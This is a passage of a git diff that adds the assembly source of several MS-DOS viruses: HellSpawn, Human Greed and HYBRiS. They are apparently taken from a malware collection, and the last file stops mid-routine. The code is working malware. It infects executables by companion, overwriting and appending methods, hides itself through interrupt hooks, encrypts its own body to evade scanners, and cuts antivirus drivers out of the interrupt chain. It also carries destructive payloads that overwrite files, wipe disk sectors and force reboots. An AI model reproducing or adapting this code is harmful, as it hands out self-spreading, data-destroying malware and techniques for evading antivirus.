48656C6C726169 +;--------------------------------------------------- + +P00100 ENDP + +CODE ENDS + END H00100 + +;------------------------------------------------------------------------------- + diff --git a/MSDOS/Virus.MSDOS.Unknown.hspawn.asm b/MSDOS/Virus.MSDOS.Unknown.hspawn.asm new file mode 100644 index 00000000..2222b2c2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hspawn.asm @@ -0,0 +1,580 @@ +; HellSpawn Virus (c) 1993 by Stormbringer +; +; +; Stormbringer +;  +; +.model tiny +.radix 16 +.code + org 100 +start: + jmp EntryPoint + +FindZero: + lodsb + or al,al + jne FindZero + + cmp ds:[si-4],'XE' + je InfectOnOpen + + cmp ds:[si-4],'OC' + jne Doneopen + +OpenRequestedFile: + mov ax,3d00 + pushf + call dword ptr cs:[IP_21] + xchg bx,ax + + xor cx,cx + xor dx,dx + mov ax,4202 + call FakeInt21 + + cmp ax,endmain-start + jne CloseUp + + pop di si ds es dx cx bx ax + stc + retf 002 + +CloseUp: + jc CloseUp + mov ah,3e + call FakeInt21 +doneOPen: + pop di si ds es dx cx bx ax + jmp Go21 + +InfectOnOpen: + pop di si ds es dx cx bx ax + jmp Execute + +NewOpen: + push ax bx cx dx es ds si di + mov dx,si + jmp FindZero +Open: + push ax bx cx dx es ds si di + mov si,dx + jmp FindZero + +Terminateprog: + mov byte ptr cs:[StealthOn],1 + jmp Go21 + + +Int21: + cmp ah,4c + je Terminateprog + or ah,ah + je Terminateprog + cmp byte ptr cs:[StealthOn],0 + je AfterStealthChecks + cmp ah,11h + je FindFile + cmp ah,12h + je FindFile + cmp ah,4eh + je FindHandle + cmp ah,4fh + je FindHandle + +AfterStealthChecks: + cmp ax,6c00 + je NewOpen + cmp ah,3dh + je Open + cmp ax,4b00h + jne Go21 + jmp Execute + +Go21: + jmp dword ptr cs:[IP_21] + +FindHandle: + pushf + call dword ptr cs:[IP_21] + jc ErrorHandleCall + + push ax bx cx dx es ds si di +GetDTA: + mov ah,2f + call FakeInt21 + + cmp word ptr es:[bx+1a],endmain-start ;Check size + jne EndHandle + + mov ah,byte ptr es:[bx+15] + and ah,2 + jz Endhandle + + pop di si ds es dx cx bx ax + + mov ah,4f + jmp FindHandle + +EndHandle: + pop di si ds es dx cx bx ax + clc +DoneHandleStealth: + retf 02 + +ErrorHandleCall: + mov ah,12 + retf 02 + +FindFile: + call FakeInt21 + cmp al,0ff + je ErrorFF + +Stealth: + push ax bx cx dx es ds si di + + mov ah,2f + call FakeInt21 + + cmp byte ptr es:[bx],0ff + jne NotExtended + add bx,7 +NotExtended: + + cmp word ptr [bx+9],'OC' + jne DoneFF + cmp word ptr [bx+1dh],endmain-start + jne DoneFF + +FindNextFile: + pop di si ds es dx cx bx ax + mov ah,12 + jmp FindFile + +DoneFF: + pop di si ds es dx cx bx ax + iret + +ErrorFF: + mov al,0ff + iret + + +Execute: + push ax bx cx dx es ds si di + + call SetCritical + + mov si,dx +FindEndOfFilename: + lodsb + or al,al + jne FindEndOfFilename + +CheckForCHKDSK: + cmp word ptr ds:[si-9],'DK' + jne AfterChkdsk + + mov byte ptr cs:[StealthOn],0 + +AfterChkdsk: + cmp byte ptr ds:[si-0a],'-' ;If it's f-prot, exit + je EndExec + + cmp word ptr ds:[si-4],'XE' + jne EndExec + + mov si,dx + mov di,offset filename + push cs + pop es + +CopyFilename: + lodsb + stosb + or al,al + jne CopyFilename + + push cs + pop ds + +ChangeToCom: + mov word ptr es:[di-4],'OC' + mov byte ptr es:[di-2],'M' + +CheckIfThere: + mov ax,3d00 + mov dx,offset filename + call FakeInt21 + xchg bx,ax + jnc CloseVirus + +PlaceVirus: + mov ah,3c + mov cx,2 + mov dx,offset Filename + call FakeInt21 + jc EndEXEC + +WriteVirus: + inc byte ptr [InfectionCounter] + xchg bx,ax + mov ah,40 + mov cx,endmain-start + mov dx,100 + call FakeInt21 + +CloseVirus: + mov ah,3e + call FakeInt21 + +EndExec: + call ResetCritical + + pop di si ds es dx cx bx ax + jmp Go21 + + +Error13: + stc + retf 02 + +Int13: + cmp ah,02 + je IsDiskRead + jmp GoInt13 + +IsDiskRead: + pushf + call dword ptr cs:[IP_13] + jc Error13 +AbsStealth: + push ax bx cx dx es ds si di + push cs + pop ds + mov di,bx + mov si,100 + mov cx,100 + repz cmpsb + jcxz IsVirus + jmp DoneAbsStealth +IsVirus: + mov di,bx + mov ax,9090 + mov cx,0fe + repnz stosw + mov ax,20cdh + stosw + +DoneAbsStealth: + pop di si ds es dx cx bx ax + clc + retf 002 + +EntryPoint: + push ds + mov ax,ds + dec ax + mov ds,ax + mov byte ptr ds:[0],'Z' ;Mark as last in chain + sub word ptr ds:[03],80 ;Allocate Space From MCB (2k) + sub word ptr ds:[12],80 ;Allocate Space From PSP (2k) + xor ax,ax + mov ds,ax + dec word ptr ds:[413] ;Allocate Memory From Bios (2k) + dec word ptr ds:[413] + mov ax,word ptr ds:[413] + +CopyVirusToMem: + mov cl,6 + shl ax,cl + sub ax,10 + mov es,ax + pop ds + push ds + mov si,100 + mov di,100 + mov cx,end_prog-start + repnz movsb + +;BX = IP of new int, CX = CS, DX = IntNum +;DI = address of interrupt storage +SetInterrupts: + xor ax,ax + mov ds,ax + cli +SetInt21: + mov ax,offset Int21 + mov bx,es + xchg ax,word ptr ds:[21*4] + xchg bx,word ptr ds:[21*4+2] + mov word ptr es:[IP_21],ax + mov word ptr es:[CS_21],bx +SetInt13: + mov ax,offset Int13 + mov bx,es + xchg ax,word ptr ds:[13*4] + xchg bx,word ptr ds:[13*4+2] + mov word ptr es:[IP_13],ax + mov word ptr es:[CS_13],bx +SetInt10: + mov ax,offset Int10 + mov bx,es + xchg ax,word ptr ds:[10*4] + xchg bx,word ptr ds:[10*4+2] + mov word ptr es:[IP_10],ax + mov word ptr es:[CS_10],bx +SetInt1c: + mov ax,offset Int1c + mov bx,es + xchg ax,word ptr ds:[1c*4] + xchg bx,word ptr ds:[1c*4+2] + mov word ptr es:[IP_1c],ax + mov word ptr es:[CS_1c],bx + +SetInt09: + mov ax,offset Int09 + mov bx,es + xchg ax,word ptr ds:[09*4] + xchg bx,word ptr ds:[09*4+2] + mov word ptr es:[IP_09],ax + mov word ptr es:[CS_09],bx + sti + + push cs + pop ds + + mov byte ptr cs:[StealthOn],1 + +RunOriginalProgram: + mov ax,ds:[2c] + mov ds,ax + xor si,si + +FindPath: + lodsw + or ax,ax + je FoundPath + dec si + jmp FindPath + +FoundPath: + lodsw + +ChangeFilenameToEXE: + push ds + pop es + mov di,si + xor al,al + mov cx,0ff + repnz scasb + mov word ptr es:[di-4],'XE' + mov byte ptr es:[di-2],'E' + + push cs + pop es + mov ah,4a + mov bx,(end_prog-start+10f)/10 + int 21 + + mov cx,di + sub cx,si + dec cx + mov di,offset Filename + mov al,cl + stosb + repnz movsb + mov byte ptr es:[di],0dh + mov si,offset Filename + push cs + pop ds + + int 2e ;Execute Command + + mov ax,4c00 + int 21 + +FakeInt21: + pushf + call dword ptr cs:[IP_21] + ret + + +SetCritical: + push ax bx ds + xor ax,ax + mov ds,ax + mov ax,offset CriticalHandler + mov bx,cs + cli + xchg ds:[24*4],ax + xchg ds:[24*4+2],bx + mov word ptr cs:[CS_24],bx + mov word ptr cs:[IP_24],ax + sti + pop ds bx ax + ret + +ResetCritical: + push ax bx ds + xor ax,ax + mov ds,ax + mov ax,word ptr cs:[IP_24] + mov bx,word ptr cs:[CS_24] + cli + mov word ptr ds:[24*4],ax + mov word ptr ds:[24*4+2],bx + sti + pop ds bx ax + ret + + + +CriticalHandler: + mov al,3 + iret + +Credits db 'HellSpawn v0.91a (c) 1993 by Stormbringer' +EndCred: + +Int10: + cmp ah,0 + jne GoInt10 + mov byte ptr cs:[FireActive],0 + cmp al,13 + jne GoInt10 + mov byte ptr cs:[FireActive],1 +GoInt10: + db 0ea +IP_10 dw 0 +CS_10 dw 0 + + +Int09: + push ax + in al,60h + cmp al,53h + je IsDel +NotCtrlAltDel: + pop ax +GoInt09: + db 0ea +IP_09 dw 0 +CS_09 dw 0 + +IsDel: + mov ah,2 + int 16 + and al,1100b + cmp al,0c + jne NotCtrlAltDel +RebootActivation: + mov di,0b800 + mov es,di + push cs + pop ds + mov si,offset Fire + mov ax,03 + int 10 + mov di,550 + + mov cx,7 +BtBigLoop: + push cx + +BtDrawFireLine: + mov cx,8 + FireLine: + lodsb + mov ah,'' + xchg ah,al + stosw + loop FireLine + + pop cx + add di,90 + loop BtBigLoop + +ColdBoot: + db 0ea + db 0,0,0ff,0ff + + +Int1c: + cmp byte ptr cs:[FireActive],1 + jne JmpInt1c + push ax bx cx dx es ds si di + call DrawFire + call ReverseFlame + pop di si ds es dx cx bx ax +JmpInt1c: + db 0ea +IP_1c dw 0 +CS_1c dw 0 + +DrawFire: + push cs + pop ds + mov si,offset Fire + mov di,0a000 + mov es,di + xor di,di + mov cx,7 + FireLoop: + push cx + mov cx,8 + repnz movsb + + add di,312d + pop cx + loop FireLoop + ret + +ReverseFlame: + push cs cs + pop es ds + mov si,offset Fire + mov cx,7 +FlipAll: + push cx + mov cx,4 + mov di,si + add di,7 + FlipLine: + mov al,byte ptr [si] + xchg al,byte ptr [di] + mov byte ptr [si],al + dec di + inc si + loop FlipLine + pop cx + loop FlipAll + ret +Fire: + db 00,04,00,00,00,00,00,00 + db 00,04,0c,04,00,00,00,00 + db 00,00,04,0c,04,00,00,00 + db 00,00,04,0c,04,04,00,00 + db 00,00,04,0e,0c,04,00,00 + db 00,04,04,0c,0e,0c,04,00 + db 04,04,0c,0e,0f,0c,0c,04 + +FireActive db 0 + +InfectionCounter db 0 + +GoInt13: + db 0ea +endmain: +IP_13 dw ? +CS_13 dw ? +IP_21 dw ? +CS_21 dw ? +CS_24 dw ? +IP_24 dw ? + +StealthOn db ? +filename db 50 dup(?) +end_prog: +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.humgreed.asm b/MSDOS/Virus.MSDOS.Unknown.humgreed.asm new file mode 100644 index 00000000..bf020374 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.humgreed.asm @@ -0,0 +1,233 @@ +; VirusName : Human Greed +; Origin : Sweden +; Author : The Unforgiven +; Date : 20/12/93 +; +; This is a "mutation" of the Infernal Demand virus, written by Metal +; Militia. Even if it's high modified, its ground is still the same. + +; This is yet another of this simple overwriting virus, and it's +; nothing really to scream hurray for. This virus will search for +; exe or com files on drive C:, and then overwrite the first 666 +; bytes, and therefor permantely destroy the victims. It used the +; "dot-dot" method for changing directory, and when all files are +; infected (overwritten), it will return to the original directory. + +; The code is encrypted, thus making it hard to detect. Scan, +; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit. +; Yes, Tbscan used to find this as the "Infernal" virus, but he +; with his 90% (nice try!) failed again!, how patetic! +; +; If a infected file is being run, it's 50% that it will display +; this stupid "Program to big to fit in memory" message. Then +; if the message is printed on the screen, it'll throw the dice +; once more. If the number are 10 or lower, it'll simple wipe out +; the first sectors by overwrite them on your C: drive. This means +; that for each run, it's 5% that it'll "go-off". + +; The "message dump" to a file under c:\ has also been deleted. +; And the new routines wich are included are, encryption, +; get/and restore directory, the randomizer, print faker, and +; of'cos the trash routine too. Hope you enjoy the code! + +;=============================================================================== +; **** HUMAN GREED **** +;=============================================================================== + +cseg segment byte public + assume cs:cseg, ds:cseg + org 100h + +virus_start: +call encrypt_decrypt +jmp encryption_start + +write_virus: ; write the virus to the +call encrypt_decrypt ; files, by overwriting + mov dx,100h ; its beginning + mov ah,40h ; + mov cx,666 ; How sadistical?? + int 21h ; + call encrypt_decrypt ; + ret + +encryption_value dw 0 +encrypt_decrypt: + mov si,offset encryption_start + mov dx,encryption_value + mov cx,(end_of_virus-encryption_start+1)/2 + +xor_loop: + xor word ptr cs:[si],dx + add si,2 +call fool_scan_for_TridenT_virus ; must call this meaningless + loop xor_loop ; routine, otherwise, infected + ret ; files will be reported by +fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus. +ret + ; just return. +encryption_start: +; get current drive + mov ah,19h ; get current drive + int 21h ; + push ax ; +; move to c: + mov ah,0Eh ; + mov dl,02h ; drive C: + int 21h + +; get directory. + mov ah,47h + xor dl,dl + lea si,[bp+infernal+2ch] + int 21h + +great: +; find first files (starting .exe's). + mov dx,offset ExeMask ; offset 'EXEMASK' + mov ah,4Eh ; find first + int 21h ; via int21 + jnc go_for_it ; jmp if no ERROR + +; if no exe's was found, just infect.COM files. + mov dx,offset ComMask ; offset 'COMMASK' + mov ah,4Eh ; find first file + ; +again: ; + int 21h ; + jc chdir ; + +go_for_it: + mov ax,4300h ; Get attribute of file + mov dx,9eh ; Pointer to name in DTA + int 21h ; + + push cx ; Push the attrib to stack + + mov ax,4301h ; Set attribute to + xor cx,cx ; normal + int 21h ; + + mov ax,3D02h ; Open file + mov dx,9eh ; Pointer to name in DTA + int 21h + + jc next ; if error, get next file + + xchg ax,bx ; Swap AX & BX + ; so the filehandle ends up + ; in BX + + mov ax,5700h ; Get file date + int 21h ; + + + push cx ; Save file dates + push dx ; + +mov encryption_value,50 ; encryption_value. + +call write_virus ; write to file(s). + pop dx ; Get the saved + pop cx ; filedates from the stack + + mov ax,5701h ; Set them back to the file + int 21h ; + + mov ah,3Eh ; Close the file + int 21h ; + + pop cx ; Restore the attribs from + + + ; the stack. + + mov dx,9eh ; Pointer to name in DTA + mov ax,4301h ; Set them attributes back + int 21h ; + +next: + mov ah,4Fh ; now get the next file + jmp short again ; and do it all over again + +chdir: +; change directory to [..] and start infect again. + mov dx,offset dot_dot ; offset 'updir' + mov ah,3bh ; change directory + int 21h + jnc great ; jmp to great if no ERROR + +exit: +; Throw the dice.. + mov ah,2ch ; + int 21h ; + cmp dl,50 + ja real_quit ; + jmp print + +; no, quitting time, yet.. + +print: +; first print message. + mov ah,09h ; Print Fake message. + mov dx,offset sign ; + int 21h ; + +get_random: +; Throw of a die.. + mov ah,2ch ; Randomize. + int 21h ; + cmp dl,10 ; + ja real_quit ; + jmp trash ; bad bad boy.. + + +trash: +; Trash routine from Nowhere Man of [NuKE], thanks. + + cli ; + mov ah,2 ; 2=C: + cwd ; + mov cx,0100h ; + int 026h ; + JMP REAL_QUIT + +real_quit: + pop dx ; + mov ah,0Eh ; restore org. drive + int 21h ; + +; restore directory + lea dx,[bp+infernal+2ch] + mov ah,3bh + int 21h + +; time to quit + mov ah,4ch ; return to prompt + int 21h ; via int21 + +; some data. + +ExeMask db '*.EXE',0 ; tought one, huh? +ComMask db '*.COM',0 ; what is this, hm +dot_dot db '..',0 ; '..' +Note db 'That is not dead ' + db 'Which can eternal lie ' + db 'Yet with strange aeons ' + db 'Even death may die ' + db 'LiVe AfteR DeATH...' + db 'Do not waste your time ' + db 'Searching For ' + db 'those wasted years! ' + db '(c) 93/94 The Unforgiven/Immortal Riot ' + db 'Thanks to Raver and Metal Militia/IR ' +truenote db 'Maria K - Life is limited, love is forever... ' + db 'Open to reality, forever in love... ' +sign db 'Program too big to fit in memory$' ; fake message! +sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! ' + db 'Do You Belive? ' + db 'Farwell!....' +end_of_virus: +infernal: +cseg ends + end virus_start diff --git a/MSDOS/Virus.MSDOS.Unknown.hybris.asm b/MSDOS/Virus.MSDOS.Unknown.hybris.asm new file mode 100644 index 00000000..491f6613 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hybris.asm @@ -0,0 +1,896 @@ +;=============================================================================== +; HYBRiS (c) 1995 The Unforgiven/Immortal Riot +; Brief description: +; TSR COM-infecting, full-stealth virus +; Self-encrypted +; Wasn't scannable when it was released by FP/Tbav/AVP.. +; Has quite some collection of grafical payloads (hoping to get AVP attention). +; Multipe interrupt handlers +; Int24h hooking +; Anti-anti-VSAFE-viruses. +; Special thanks to Priest & Stormbringer of Phalcon/Skism +;=============================================================================== + + + .model tiny + .code + org 100h + + vir_size equ virus_end-virus_start + + +virus_start: + + jmp entry_point + +install: + + mov ax,99 ;input = rnd_value in AX + call random ;output = (zero -> rnd_value) + jne get ;if output=0, activate.. + mov cs:[activate_flag][bp],1 + +get: + mov ax,108 + call random + jne real_get + +start_payload: + call main_payload ;'loop' until ESC is being pressed.. + in al,60h + cmp al,1 + jne start_payload + jmp short real_get + +main_payload: ;remake of a payload I wrote for + mov ax,3 ;IR#6.. + int 10h + push ax + push cx + push dx + mov ax,03f00h + mov dx,03c8h + out dx,al + inc dx + mov ax,-1 + out dx,al + xchg al,ah + out dx,al + xchg al,ah + out dx,al + mov cx,-1 + loop $ + dec dx + xor ax,ax + out dx,al + inc dx + out dx,al + out dx,al + out dx,al + pop dx + pop cx + pop ax + ret + +real_get: + mov ah,4ah ;Residency routine combined with + mov bx,-1 ;installation check + mov cx,0d00dh + int 21h + cmp ax,cx + jne not_res + jmp already_resident + +not_res: + mov ah,4ah ;resize mcb + sub bx,(vir_size+15)/16+1 ;bx=size in para's + int 21h ;es =segment + + mov ah,48h ;allocate memory block + mov bx,(vir_size+15)/16 ;bx = size in para's + int 21h ;returns pointer to the beginning + ;of the new block allocated + + dec ax ;dec ES to get pointer to mcb + mov es,ax ;es=segment + mov word ptr es:[1],8 ;ofs:1 in mcb = owner, 8 = dos + + push cs ;cs=ds + pop ds + + cld ;clear direction + sub ax,0fh ;substact 15 from ax, + mov es,ax ;thus es:[100h] = start of allocated memory + mov di,100h ;di = 100h (beginning of file) + lea si,[bp+offset virus_start] ;si points to start of virus + mov cx,(vir_size+1)/2 ;copy it resident with words + rep movsw ;until cx = 0 (the whole virus copied) + + push es ;es=ds + pop ds + + mov ax,3521h ;get interrupt vector from es:bx for + int 21h ;int21h + +tb_lup: + cmp word ptr es:[bx],05ebh ;all tbav's utils starts with this code, + jne no_tbdriver ;if its found, get next interrupt handler + cmp byte ptr es:[bx+2],0eah ;and use that as the int21h adress + jne no_tbdriver ;thereby, cutting tbav out from our + les bx,es:[bx+3] ;int21h handler. loop until it's out of + jmp tb_lup ;there. (dunno if this works anymore..) + +no_tbdriver: + mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h + mov word ptr ds:[Org21seg],es ;in a word each + + cmp byte ptr cs:[activate_flag][bp],1 ;check if we should activate + jne skip_08_get ;the int8 handler + + mov al,08h ;if so, get interrupt-vector + int 21h ;for int8h + mov word ptr ds:[org08ofs],bx + mov word ptr ds:[org08seg],es + +skip_08_get: + mov al,09h ;int9 + int 21h + mov word ptr ds:[org09ofs],bx + mov word ptr ds:[org09seg],es + + mov al,16h ;16h + int 21h + mov word ptr ds:[org16ofs],bx + mov word ptr ds:[org16seg],es + + mov dx, offset new_int21h ;set new interrupt handlers + mov ax,2521h ;to ds:dx for int21h + int 21h + + cmp byte ptr cs:[activate_flag][bp],1 ;if we didnt get int8, dont + jne skip_08_set ;set a new either! + + mov dx, offset new_08h + mov al,08h + int 21h + +skip_08_set: + mov dx,offset new_09h ;int9 handler installed + mov al,09h + int 21h + + mov dx,offset new_16h ;int 16h handler installed + mov al,16h + int 21h + +already_resident: +tbdriver: + mov di,100h + push di ;save di at 100h + push cs ;make cs=ds=es + push cs + pop es + pop ds + lea si,[bp+orgjmp] ;and copy the first 4-init-bytes to + movsw ;the beginning (in memory) so we can + movsw ;return back to the host properly + ret ;jmp di, 100h (since we pushed it above) + +new_int21h: + cmp ah,4ah ;installation check part at the beginning + jne chk_vsafe ;no 4ah executed, try next option + cmp bx,-1 ;ah = 4ah, check if bx and cx is set by + jne no_match ;our virus + cmp cx,0d00dh + jne no_match ;no. + mov ax,cx ;move cx into ax + iret ;and do a interrupt return + +chk_vsafe: + cmp ax,0fa01h ;a resident anti-virus-virus, + jne chk_exec ;checker + cmp dx,5945h + je go_vsafe + +chk_exec: + cmp ax,4b00h ;Since this is a com infector only, + je go_infect ;I don't have to check if al=0, still + ;I do it :). + +chk_close: + cmp ah,3eh ;check for file-closes + je go_close ; ==> infect + + cmp ah,3dh ;file open + je go_disinfect ; ==> disinfect + +chk_dir: + cmp ah,11h ;stealth functions on + je go_fcb_stealth ;directory listenings with + cmp ah,12h ;11/12/4e/4fh + je go_fcb_stealth + + cmp ah,4eh + je go_handle_stealth + + cmp ah,4fh + je go_handle_stealth + +no_match: + jmp do_oldint21h ;nothing matched! + +go_vsafe: ;indirect-jumps due to 128d bytes jmp's + jmp unload_vsafe ;directives. + +go_infect: + jmp infect + +go_close: + call setcritical ;if infect on close, install a critical + jmp infect_close ;error handler before + +go_disinfect: + call setcritical ;disinfect calls also modifies programs, + jmp disinfect_dsdx ;install the int24h handler before trying + ;doing disinfection + +go_fcb_stealth: ;11 & 12h calls get's here, to be + jmp hide_dir ;transfered into another routine + ;(* Very unstructured programming *) + +go_handle_stealth: + jmp hide_dir2 + +dps db "THIS PROGRAM IS (C) 1995 IMMORTAL RIOT",0 ; no shit! + +new_08h: + push ax ;If the int08h installer is + push dx ;installed, the screen background + mov dx,03c8h ;color will fade to white return + xor al,al ;to original color (black), and + out dx,al ;'loop' that procedure all over again + inc dx ;since its activated all the time by + mov al,[cs:bgcol] ;dos internal services. . + out dx,al + out dx,al + out dx,al + inc [cs:bgcol] + pop dx + pop ax + + db 0eah + org08ofs dw ? + org08seg dw ? + +bgcol db 0 + +new_09h: + + push ax ;preserve register in use + push ds + + xor ax,ax + mov ds,ax ;ds=0 + + in al,60h ;read key + cmp al,53h ;delete? + jnz no_ctrl_alt_del ;no! + + test byte ptr ds:[0417h],0ch ;test for alt OR ctrl + je no_ctrl_alt_del ; + jpo no_ctrl_alt_del ;<- Wow. ctrl and alt? + + in al,40h ;A small randomizer, this gives us + and al,111111b ;one in 64 I reckon :-). + cmp al,111111b + je no_ctrl_alt_del + + push cs + pop ds + + mov ax,3 ;set grafic mode and clear screen, too + int 10h + + mov ah,2 ;set cursor pos + xor bh,bh + mov dx,0A14h ;10,20d (middle) + int 10h + + mov ah,1 ;set cursor + mov cx,2020h ;>nul + int 10h + + mov si,offset dps ;point to v_name, of sorts. + +all_chars: + loop all_chars + lodsb ;load string by byte from dps + or al,al ;end of string? (al=0) + je cold_boot ;yes, make a cold boot + + mov ah,0Eh ;display character from string + int 10h + + jmp short all_chars ;put next char to string + +cold_boot: + db 0eah ;jmp far ptr + db 00h, 00h, 0ffh,0ffh + +no_ctrl_alt_del: + pop ds ;restore registers + pop ax + +do_oldint09h: + db 0eah ;and jump to saved vector for int09h + org09ofs dw ? + org09seg dw ? + + +new_16h: + cmp ax,0fa01h ;check ax for 'vsafe-unload-value' + jne do_oldint16h ;no match in ax. + cmp dx,5945h ;check ds for 'vsafe-unload-value' + jne do_oldint16h ;no match in dx. + jmp unload_vsafe ;program is probably virus-infected. + +do_oldint16h: + db 0eah ;program is not trying to unload + org16ofs dw ? ;vsafe.. + org16seg dw ? + +hide_dir: ;FCB stealth routine + pushf ;simulate a int call with pushf + push cs ;and cs, ip on the stack + call do_oldint21h + or al,al ;was the dir call successfull?? + jnz skip_dir ;(i.e. did we find files?) + + push ax ;we did find files, save ax/bx/es + push bx ;since we use them in this routine + push es + + mov ah,62h ;get active PSP to es:bx + int 21h + mov es,bx + cmp bx,es:[16h] ;PSP belongs to dos? + jnz bad_psp ;no, just stealth on DIR (ie. command.com + ;is the owner of the psp) + + mov bx,dx ;offset to unopened FCB in BX + mov al,[bx] ;FCB-type in AL.. + push ax ;Save it + mov ah,2fh ;Get DTA-area + int 21h + pop ax ;Restore AX + inc al ;check if al=0 or al=ff + jnz no_ext ;If it's not 0, then, it's not extended + add bx,7 ;if it's extended add 7 to skip garbage +no_ext: + mov al,byte ptr es:[bx+17h] ;get seconds field + and al,1fh + xor al,1dh ;is the file infected?? + jnz no_stealth ;if not - don't hide size + + cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds + jbe no_stealth ;as an infected is smaller - + sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size +no_stealth: +bad_psp: + pop es ;restore segments/registers + pop bx ;used and return to caller + pop ax +skip_dir: + iret + +hide_dir2: ;4e/4fh stealth + + pushf + push cs + call do_oldint21h + + jc no_files + + pushf + push ax + push di + push es + push bx + + mov ah,2fh + int 21h + + mov di,bx + add di,1eh + cld + mov cx,9 ;scan for the '.' which seperates + mov al,'.' ;the filename from the extension + repne scasb + jne not_inf ;<- Filename without any extension! + + cmp word ptr es:[di],'OC' + jne not_inf ;most likely a com + + cmp byte ptr es:[di+2],'M' + jne not_inf ;Definitly com + + mov ax,es:[bx+16h] ;ask file time + and al,1fh + xor al,1dh ;can the file be infected? + jnz not_inf + + cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small + ja hide ;files + + cmp word ptr es:[bx+1ch],0 ;>64k? (no-com) + je not_inf ;don't stealth too large files.. + +hide: + sub es:[bx+1ah],vir_size-3 ;stealth + +not_inf: + pop bx + pop es + pop di + pop ax + popf + +no_files: + retf 2 + +infect_close: ;3eh calls arrives at this entry + push es + push bp + push ax + push bx + push cx + push si + push di + push ds + push dx + cmp bx,4 ;don't close null, aux and so + jbe no_close + + call check_name ;es:di points to file name + add di,8 ;es:di points to extension + cmp word ptr es:[di],'OC' + jne no_close + cmp byte ptr es:[di+2],'M' ;es:di+2 points to 3rd char in extension + je close_infection + +no_close: + pop dx ;no com-file being opened + pop ds + pop di + pop si + pop cx + pop bx + pop ax + pop bp + pop es + + jmp do_oldint21h + + +close_infection: + or byte ptr es:[di-26h],2 + mov cs:Closeflag,1 ;mark that 3e-infection = on + + mov ax,4200h ;seek tof. + xor cx,cx + cwd + int 21h + + jmp short infect_on_close ;infect it + +check_name: + push bx + mov ax,1220h ;get job file table for handle at es:di + int 2fh + + mov ax,1216h ;get system file table + mov bl,byte ptr es:[di] ;for handle index in bx + int 2fh + pop bx + add di,20h ;es:di+20h points to file name + ret ;return + +infect: + push es + push bp + push ax + push bx + push cx + push si + push di + push ds + push dx + + call setcritical ;install a critical error handler + + mov cs:Closeflag,0 ;make sure closeflag is off + mov ax,4300h ;get attrib + int 21h + push cx ;save attrib onto the stack + mov ax,4301h ;clear attrib + xor cx,cx + int 21h + + mov ax,3d00h ;open file in read mode only + int 21h + xchg ax,bx + mov ax,1220h + int 2fh + push bx + mov ax,1216h ;modify + mov bl,byte ptr es:[di] + int 2fh + pop bx + or byte ptr es:[di+2],2 ;to read & write mode in the SFT-entry + +infect_on_close: ;entry for infection on 3eh + + + push cs ;cs=ds + pop ds + + mov ax,5700h ;get time/date + int 21h + push cx ;save time/date onto the stack + push dx + + mov ah,3fh ;read first four bytes to orgjmp + mov cx,4 + mov dx,offset ds:orgjmp + int 21h + + cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file + je exe_file + cmp word ptr ds:orgjmp,'MZ' + je exe_file ;if so - don't infect + + cmp byte ptr ds:orgjmp+3,'@' ;dont reinfect! + jne lseek_eof + jmp skip_infect + +exe_file: + mov cs:exeflag,1 ;mark file as EXE-file, and + jmp short skip_infect ;don't set second value for it! + +lseek_eof: + mov ax,4202h ;go end of file, offset in dx:cx + xor cx,cx ;and return file size in dx:ax. + xor dx,dx + int 21h + + cmp ax,(0FFFFH-Vir_size) ;dont infect to big or + jae skip_infect ;to small files + cmp ax,(vir_size-100h) + jb skip_infect + + add ax,offset entry_point-106h ;calculate entry offset to jmp + mov word ptr ds:newjmp[1],ax ;move it [ax] to newjmp + +get_rnd: + mov ah,2ch ;get random number and put enc_val + int 21h + or dl,dl ;dl=0 - get another value! + je get_rnd + mov word ptr ds:enc_val,dx + mov ax,08d00h ;copy entire virus to 8d00h:100h + mov es,ax + mov di,100h + mov si,di + mov cx,(vir_size+1)/2 + rep movsw + push es + pop ds + xor bp,bp ;and encrypt it there + call encrypt + + mov ah,40h ;write virus to file from position + mov cx,virus_end-install ;08d00h:100h + mov dx,offset install + int 21h + + push cs ;cs=ds + pop ds + + mov ax,4200h ;go to beginning of file + xor cx,cx + cwd + int 21h + + mov ah,40h ;and write a new-jmp-construct + mov cx,4 ;of 4 bytes (4byte=infection marker) + mov dx,offset newjmp + int 21h + +skip_infect: + mov ax,5701h ;restore + pop dx ;date + pop cx ;time + cmp byte ptr cs:[exeflag],1 ;exe file? + je skip_sec ;if so - keep the sec_value intact + or cl,00011101b ;and give com-files second value + and cl,11111101b ;29 + +skip_sec: + int 21h + cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection, + je dont_close ;if infect on close, dont close file + +close_file: + mov ah,3eh ;close the file which were executed + int 21h + pop cx ;get original file-attribs +dont_close: + pop dx ;ds:dx = filename + pop ds + cmp byte ptr cs:[Closeflag],1 + je exit_close + mov ax,4301h ;set back saved attribute + int 21h + +exit_close: + mov byte ptr cs:closeflag,0 + call resetcritical ;set back critical error handler int24h + pop di + pop si + pop cx + pop bx + pop ax + pop bp + pop es ;restore registers in use + +do_oldint21h: +O21h: + db 0eah ;jmp far ptr + org21ofs dw ? ;s:o to + org21seg dw ? ;int21h + + ret ;call to DOS. . . return! + +unload_vsafe: + mov ah,9 + mov dx, offset v_name + push ds + push cs + pop ds + int 21h + pop ds + mov ax,4c00h ;exit program infected with an other + int 21h ;virus. + +v_name db "[HYBRiS] (c) '95 =TU/IR=",'$' + +closeflag db 0 +exeflag db 0 +activate_flag db 0 + +disinfect_dsdx: + push ax + push bx + push cx + push dx + push di + push si + push ds + push es ;save all regs/segs... + + push ds + pop es ;ds=es + + mov cx,64 ;scan for the dot which + mov di,dx ;seperates filename from + mov al,'.' ;extension + cld ;clear direction + repne scasb ; + jne nocom ;<- was no '.' in filename + ;(aint likely a comfile) + + cmp word ptr ds:[di],'OC' + je smallc + cmp word ptr ds:[di],'oc' + jne nocom + +smallc: + cmp byte ptr ds:[di+2],'M' + je open_com + cmp byte ptr ds:[di+2],'m' + je open_com + +nocom: + jmp no_com_opened ;no com-file being opened! + +open_com: + + mov ax,3d02h 